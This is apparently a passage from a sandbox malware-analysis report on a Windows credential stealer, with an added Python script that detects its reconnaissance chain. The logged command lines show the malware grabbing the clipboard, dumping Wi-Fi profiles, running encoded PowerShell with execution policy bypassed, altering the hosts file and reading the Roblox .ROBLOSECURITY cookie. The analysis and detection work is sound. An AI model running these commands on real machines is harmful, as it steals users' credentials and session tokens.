Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell Get-Clipboard
Imagebase:0x340000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist /FO LIST
Imagebase:0xb00000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh wlan show profile
Imagebase:0x1560000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\systeminfo.exe
Wow64 process (32bit):true
Commandline:systeminfo
Imagebase:0x340000
File size:76'800 bytes
MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:01:19:33
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:01:19:34
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:01:19:34
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:01:19:34
Start date:05/01/2025
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase:0x340000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:01:19:35
Start date:05/01/2025
Path:C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):true
Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:0xf0000
File size:59'392 bytes
MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:01:19:35
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:74
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:76
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                              File size:2'141'552 bytes
                                                                                                                                                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
                                                                                                                                                                                                                              Imagebase:0xce0000
                                                                                                                                                                                                                              File size:46'832 bytes
                                                                                                                                                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:84
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:85
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\getmac.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                                                                                              File size:65'024 bytes
                                                                                                                                                                                                                              MD5 hash:31874C37626D02373768F72A64E76214
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                              Start time:01:19:39
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                              Start time:01:19:40
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

Target ID: 91
Start time: 01:19:40
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 92
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 93
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist /FO LIST
Imagebase: 0xb00000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 94
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\tree.com
Wow64 process (32bit): true
Commandline: tree /A /F
Imagebase: 0x8e0000
File size: 17'920 bytes
MD5 hash: 7E896B29B309DE74A72DEC7D59715EFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 95
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 96
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 97
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x340000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

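The process records above show the stealer's host-reconnaissance chain: a `tasklist /FO LIST` process inventory, a `tree /A /F` filesystem listing, and a `cmd.exe /c powershell Get-ItemPropertyValue ... -Name .ROBLOSECURITY` read of the Roblox session cookie from HKCU, all started within the same second. `tasklist` and `tree` alone are too common to alert on, but the three together under one parent are a strong signal. The following detection logic is an added example, not Joe Sandbox output or Blank Grabber code; the log layout, the process IDs and the timestamps in `SAMPLE_LOG` are constructed for illustration and only the command lines are taken from the report.

```python
"""Detect the tasklist / tree / .ROBLOSECURITY reconnaissance chain in
process-creation logs. Added example; the record format below is a
constructed Sysmon-like key=value layout, not a Joe Sandbox export."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (hypothetical pids/ppids and times).
# Lines 1-4 mirror the chain from the report; line 5 is an unrelated, lone
# "tree" invocation that must NOT produce a chain alert.
SAMPLE_LOG = """\
time=2025-01-05T01:19:41 pid=4101 ppid=3990 image=C:\\Windows\\SysWOW64\\tasklist.exe cmd=tasklist /FO LIST
time=2025-01-05T01:19:41 pid=4102 ppid=3990 image=C:\\Windows\\SysWOW64\\tree.com cmd=tree /A /F
time=2025-01-05T01:19:41 pid=4103 ppid=3990 image=C:\\Windows\\SysWOW64\\cmd.exe cmd=C:\\Windows\\system32\\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
time=2025-01-05T01:19:41 pid=4104 ppid=4103 image=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
time=2025-01-05T01:25:00 pid=5200 ppid=5100 image=C:\\Windows\\System32\\tree.com cmd=tree /A /F
"""

# "cmd=" is the last field so it may contain spaces and quotes.
LINE_RE = re.compile(r"time=(\S+) pid=(\d+) ppid=(\d+) image=(\S+) cmd=(.*)$")

# One rule per stage of the chain, matched against the command line only.
RULES = {
    "recon_tasklist": re.compile(r"^tasklist\s+/FO\s+LIST\b", re.I),
    "recon_tree": re.compile(r"^tree\s+/A\s+/F\b", re.I),
    "roblox_cookie_read": re.compile(r"\.ROBLOSECURITY\b", re.I),
}


def parse_events(text):
    """Parse key=value records into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        t, pid, ppid, image, cmd = m.groups()
        events.append({
            "time": datetime.fromisoformat(t),
            "pid": int(pid),
            "ppid": int(ppid),
            "image": image,
            "cmd": cmd,
        })
    return events


def match_rules(event):
    """Names of the rules whose regex hits this event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmd"])]


def find_recon_chains(events, window=timedelta(seconds=60)):
    """Group rule hits by parent pid; report parents under which every
    stage of the chain fired within `window` of each other."""
    by_parent = defaultdict(list)
    for ev in events:
        hits = match_rules(ev)
        if hits:
            by_parent[ev["ppid"]].append((ev["time"], ev["pid"], hits))

    chains = []
    for ppid, hits in by_parent.items():
        hits.sort()  # chronological, then by pid
        first_seen = {}  # rule name -> time of its first hit under this parent
        for t, _pid, names in hits:
            for n in names:
                first_seen.setdefault(n, t)
        if set(first_seen) == set(RULES) and \
                max(first_seen.values()) - min(first_seen.values()) <= window:
            chains.append({
                "ppid": ppid,
                "first": min(first_seen.values()),
                "children": [pid for _, pid, _ in hits],
            })
    return chains


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for c in find_recon_chains(evs):
        print(f"recon chain under parent pid {c['ppid']} at {c['first']}: "
              f"children {c['children']}")
```

Run against the constructed log, the script reports one chain under parent pid 3990 (children 4101, 4102, 4103) and stays silent on the lone `tree` at 01:25. The `.ROBLOSECURITY` rule also fires on the inner `powershell.exe` record, but that record's parent is the `cmd.exe` wrapper, which never sees `tasklist` or `tree`, so it does not form a second chain; in a real deployment the single-stage cookie read is still worth its own lower-severity alert, since there is no legitimate reason for a script to pull that value.
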
Target ID: 98
Start time: 01:19:41
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 99
Start time: 01:19:42
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 100
Start time: 01:19:42
Start date: 05/01/2025
Path: C:\Windows\SysWOW64\tree.com
Wow64 process (32bit): true
Commandline: tree /A /F
Imagebase: 0x8e0000
File size: 17'920 bytes
MD5 hash: 7E896B29B309DE74A72DEC7D59715EFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                              Target ID:101
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:102
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:103
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:104
                                                                                                                                                                                                                              Start time:01:19:43
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
